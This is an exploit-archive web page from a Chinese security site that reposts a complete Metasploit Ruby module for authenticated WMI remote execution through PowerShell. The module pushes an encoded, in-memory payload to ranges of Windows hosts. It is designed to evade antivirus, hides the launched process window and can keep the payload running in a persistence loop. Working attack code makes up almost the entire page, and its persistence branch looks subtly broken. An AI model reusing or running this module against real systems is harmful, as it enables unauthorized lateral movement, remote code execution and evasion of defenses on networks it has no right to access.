首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Authenticated WMI Exec Via Powershell
来源:metasploit.com 作者:RageLtMan 发布时间:2016-11-18  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'
require 'msf/core/post/windows/powershell'
require 'msf/core/post/windows/priv'
require 'msf/core/exploit/powershell/dot_net'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Powershell
  include Msf::Exploit::Powershell::DotNet
  include Msf::Post::Windows::Priv

  def initialize(info={})
    super(update_info(info,
      'Name'                 => "Authenticated WMI Exec via Powershell",
      'Description'          => %q{
        This module uses WMI execution to launch a payload instance on a remote machine.
        In order to avoid AV detection, all execution is performed in memory via psh-net
        encoded payload. Persistence option can be set to keep the payload looping while
        a handler is present to receive it. By default the module runs as the current
        process owner. The module can be configured with credentials for the remote host
        with which to launch the process.
      },
      'License'              => MSF_LICENSE,
      'Author'               => 'RageLtMan <rageltman[at]sempervictus>',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload' => { 'Space' => 8192 },
      'Platform'      => [ 'windows' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets' => [ [ 'Universal', {} ] ],
      'DefaultTarget' => 0,
      'DisclosureDate'=> "Aug 19 2012"

    ))

    register_options(
      [
        OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
        OptString.new('USERNAME', [false, "Username to authenticate as"]),
        OptString.new('PASSWORD', [false, "Password to authenticate with"]),
        OptString.new('DOMAIN', [false, "Domain or machine name"]),

      ], self.class)

    register_advanced_options(
      [
        OptBool.new('PowerShellPersist', [false, 'Run the payload in a loop']),
        OptBool.new('RunRemoteWow64', [
          false,
          'Execute powershell in 32bit compatibility mode, payloads need native arch',
          false
        ]),

      ], self.class)

  end

  def build_script
    run_opts = {}
    run_opts[:username] = datastore['USERNAME']
    run_opts[:domain] = datastore['DOMAIN'] || '.'
    run_opts[:password] = datastore['PASSWORD']

    # End of file marker
    eof = Rex::Text.rand_text_alpha(8)
    env_suffix = Rex::Text.rand_text_alpha(8)

    # Create base64 encoded payload
    psh_payload_raw = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.raw)
    if datastore['PowerShellPersist']
      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
      sleep_time = rand(5)+5
      psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
    end
    psh_payload = compress_script(psh_payload_raw, eof)
    # WMI exec function - this is going into powershell.rb after pull 701 is commited
    script = ps_wmi_exec(run_opts)
    # Build WMI exec calls to every host into the script to reduce PS instances
    # Need to address arch compat issue here, check powershell.exe arch, check pay arch
    # split the hosts into wow64 and native, and run each range separately
    ps_bin = datastore['RunRemoteWow64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
    # for whatever reason, passing %systemroot% instead of 'C:\windows' fails

    if datastore["RHOSTS"]
      # Iterate through our hosts list adding a call to the WMI wrapper for each.
      # This should learn to differentiate between hosts and call WOW64 as appropriate,
      # as well as putting the payload into a variable when many hosts are hit so the
      # uploaded script is not bloated since each encoded payload is bulky.

      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
        if run_opts[:username] and run_opts[:password]
          script << " New-RemoteProcess -rhost \"#{host}\" -login \"#{run_opts[:domain]}\\#{run_opts[:username]}\""
          script << " -pass '#{run_opts[:password]}' -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\";"
        else
          script << " New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\";"
        end
      end
    else
      print_status('Running Locally')
      script = psh_payload_raw
    end
    return script
  end

  def exploit
    # Make sure we meet the requirements before running the script
    unless have_powershell?
      fail_with(Failure::BadConfig, 'PowerShell not found')
    end


    # SYSTEM doesnt have credentials on remote hosts
    if is_system? and datastore['RHOSTS']
      print_error("Cannot run as local system on remote hosts")
      return 0
    end

    script = build_script

    if datastore['Powershell::Post::dry_run']
      print_good script
      return
    end

    begin
      psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)
      print_good(psh_output)
    rescue Rex::TimeoutError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end

    vprint_good('PSH WMI exec is complete.')
  end

  # Wrapper function for instantiating a WMI win32_process
  # class object in powershell.
  # Insantiates the [wmiclass] object and configures the scope
  # Sets impersonation level and injects credentials as needed
  # Configures application startup options to hide the newly
  # created window. Adds start-up check for remote proc.
  def ps_wmi_exec(opts = {})

    ps_wrapper = <<EOS
Function New-RemoteProcess {
    Param([string]$rhost,[string]$cmd,[string]$login,[string]$pass)
    $ErrorActionPreference="SilentlyContinue"
  $proc = [WMIClass]"\\\\$rhost\\root\\cimv2:Win32_Process"
EOS
  if opts[:username] and opts[:password]
    ps_wrapper += <<EOS
  $proc.psbase.Scope.Options.userName = $login
  $proc.psbase.Scope.Options.Password = $pass
EOS
  end
  ps_wrapper += <<EOS
  $proc.psbase.Scope.Options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
  $proc.psbase.Scope.Options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy
  $startup = [wmiclass]"Win32_ProcessStartup"
  $startup.Properties['ShowWindow'].value=$False
  $remote = $proc.Create($cmd,'C:\\',$startup)
  if ($remote.returnvalue -eq 0) {
    Write-Host "Successfully launched on $rhost with a process id of" $remote.processid
  } else {
    Write-Host "Failed to launch on $rhost. ReturnValue is" $remote.ReturnValue
  }
}

EOS

    return ps_wrapper
  end

end


#
# Ideally the methods to create WMI wrapper functions and their callers
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
#

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Edge Eval Type Confu
·PowerShellEmpire Arbitrary Fil
·Microsoft Internet Explorer 8
·Nagios 4.2.2 - Privilege Escal
·Nginx (Debian-Based Distributi
·FTPShell Client 5.24 - 'PWD' R
·WinaXe 7.7 FTP Client - Remote
·Moxa SoftCMS 1.5 - Denial of S
·Microsoft Windows - VHDMP Arbi
·Microsoft Edge - 'FillFromProt
·Microsoft Windows - VHDMP ZwDe
·Microsoft Edge - 'Array.filter
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved